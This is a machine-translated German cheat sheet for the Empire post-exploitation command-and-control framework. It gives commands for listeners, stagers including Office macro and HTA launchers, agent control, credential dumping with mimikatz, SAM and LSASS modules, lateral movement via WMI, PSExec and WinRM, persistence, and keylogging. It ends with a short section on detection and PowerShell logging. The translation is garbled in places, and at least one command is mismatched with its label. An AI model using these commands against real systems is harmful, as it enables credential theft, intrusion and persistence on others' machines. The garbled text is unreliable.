Zum Inhalt

Empire Framework Cheat Blatt

generieren

Überblick

Empire ist ein post-exploitation Framework, das einen rein-PowerShell 2.0 Windows Agent und einen reinen Python 3 Linux/macOS Agent umfasst. Es bietet eine leistungsfähige Befehls- und Kontrollinfrastruktur (C2) für rote Teamoperationen, Penetrationstests und adversäre Emulation.

ZEIT Warning: Empire ist ein Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

Installation

Von GitHub

# Clone the repository
git clone https://github.com/BC-SECURITY/Empire.git

# Navigate to the directory
cd Empire

# Run the installation script
sudo ./setup/install.sh
```_

### Verwendung von Docker
```bash
# Pull the Docker image
docker pull bcsecurity/empire:latest

# Run the container
docker run -it -p 1337:1337 -p 5000:5000 bcsecurity/empire:latest
```_

### Auf Kali Linux
```bash
# Install from package manager
sudo apt update
sudo apt install powershell-empire
```_

## Basisnutzung

### Starting Empire
```bash
# Start the Empire server
sudo empire

# Start with REST API (for Starkiller)
sudo empire --rest --username <username> --password <password>
```_

### Verwendung von Starkiller (GUI)
```bash
# Install Starkiller
npm install -g @starkiller/starkiller

# Run Starkiller
starkiller
```_

## Reich CLI Navigation

|Command|Description|
|---------|-------------|
|`help`|Display help menu|
|`menu`|Return to the main menu|
|`back`|Go back one menu level|
|`exit`|Exit Empire|
|`usemodule <module>`|Select a module to use|
|`usestager <stager>`|Select a stager to use|
|`uselistener <listener>`|Select a listener to use|
|`interact <agent>`|Interact with an agent|
|`searchmodule <term>`|Search for modules|

## Hörer

### Einen Hörer erstellen

In Empire CLI

listeners uselistener http set Name http_listener set Host 192.168.1.100 set Port 8080 execute 

### Gemeinsame Listener Optionen

|Option|Description|
|--------|-------------|
|`Name`|Name for the listener|
|`Host`|IP/hostname for staging|
|`Port`|Port for the listener|
|`CertPath`|Certificate path for HTTPS|
|`DefaultDelay`|Agent callback delay (in seconds)|
|`DefaultJitter`|Jitter in agent callbacks (0.0-1.0)|
|`DefaultProfile`|Default communication profile|
|`KillDate`|Date for the listener to exit (MM/DD/YYYY)|
|`WorkingHours`|Hours for the agent to callback (09:00-17:00)|

### Hörer Management

List all listeners

listeners

Kill a listener

kill http_listener

View a listener's options

info http_listener 

## Bühnen

### Einen Stager generieren

In Empire CLI

usestager windows/launcher_bat set Listener http_listener generate 

### Gemeinsame Bühnentypen

|Stager|Description|
|--------|-------------|
|`windows/launcher_bat`|BAT file launcher|
|`windows/launcher_vbs`|VBS script launcher|
|`windows/launcher_powershell`|PowerShell launcher|
|`multi/launcher`|Multi-platform launcher|
|`osx/launcher`|macOS launcher|
|`linux/launcher`|Linux launcher|
|`windows/dll`|DLL launcher|
|`windows/macro`|Office macro launcher|
|`windows/hta`|HTA launcher|

## Agenten

### Agent Commands

List all agents

agents

Interact with an agent

interact C2AGENT123

Get agent info

info

Execute a shell command

shell whoami

Run a PowerShell command

powershell Get-Process

Upload a file

upload /path/to/local/file /path/on/target

Download a file

download /path/on/target /local/path

Take a screenshot

screenshot

Exit agent menu

back 

### Personalmanagement

Rename an agent

rename C2AGENT123 new_name

Kill an agent

kill C2AGENT123

Remove an agent from the database

remove C2AGENT123

Set sleep interval

sleep 30

Set jitter percentage

sysinfo 

## Module

### Module verwenden

List available modules

usemodule

Search for modules

searchmodule credentials

Use a specific module

usemodule powershell/situational_awareness/network/powerview/get_user

Set module options

set Username administrator

Execute the module

execute 

### Allgemeine Modulkategorien

#### Zugang zu Informationen

Dump credentials from memory

usemodule powershell/credentials/mimikatz/logonpasswords

Dump SAM database

usemodule powershell/credentials/sam

Dump LSASS process

usemodule powershell/credentials/credential_injection/lsass_dump 

#### Situationsbewusstsein

Get domain users

usemodule powershell/situational_awareness/network/powerview/get_user

Get domain computers

usemodule powershell/situational_awareness/network/powerview/get_computer

Get domain groups

usemodule powershell/situational_awareness/network/powerview/get_group 

#### Spätere Bewegung

WMI lateral movement

usemodule powershell/lateral_movement/invoke_wmi

PSExec lateral movement

usemodule powershell/lateral_movement/invoke_psexec

WinRM lateral movement

usemodule powershell/lateral_movement/invoke_winrm 

#### Persistenz

Registry persistence

usemodule powershell/persistence/userland/registry

Scheduled task persistence

usemodule powershell/persistence/userland/schtasks

WMI persistence

usemodule powershell/persistence/elevated/wmi 

## Erweiterte Funktionen

### Malleable C2 Profile

In Empire CLI

profiles use default set DefaultProfile /path/to/profile.profile 

### OPSK Erwägungen

Set agent kill date

set KillDate 01/01/2025

Set working hours

set WorkingHours 09:00-17:00

Increase agent sleep time

sleep 300 30 

### Daten Exfiltration

Use keylogging module

usemodule powershell/collection/keylogger

Use clipboard monitoring

usemodule powershell/collection/clipboard_monitor

Use screenshot module

usemodule powershell/collection/screenshot ```_

Fehlerbehebung

Gemeinsame Themen

  1. ** Probleme der Kontaktaufnahme* * ```bash # Check if the listener is running listeners

# Verify firewall settings sudo iptables -L

# Check for port conflicts netstat -tuln|grep ```_

  1. Agent nicht überprüfen In ```bash # Verify agent is running agents

# Check for network connectivity issues # Verify sleep/jitter settings ```_

  1. **Module Ausführunfälle* * ```bash # Check module requirements info

# Verify agent privileges shell whoami

# Try running in a different process context usemodule powershell/management/psinject ```_

Defensive Maßnahmen

Nachweismethoden

  • PowerShell Script Block Log
  • PowerShell Modul Protokollierung
  • AMSI (Antimalware Scan Interface)
  • Verkehrsanalyse
  • Verhaltensanalyse

Präventionstechniken

```powershell

Enable PowerShell Script Block Logging

Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

Enable PowerShell Module Logging

Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1

Enable Constrained Language Mode

$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage" ```_

Ressourcen

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Empire in Sicherheitstests. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie dieses Tool in jeder Umgebung verwenden. *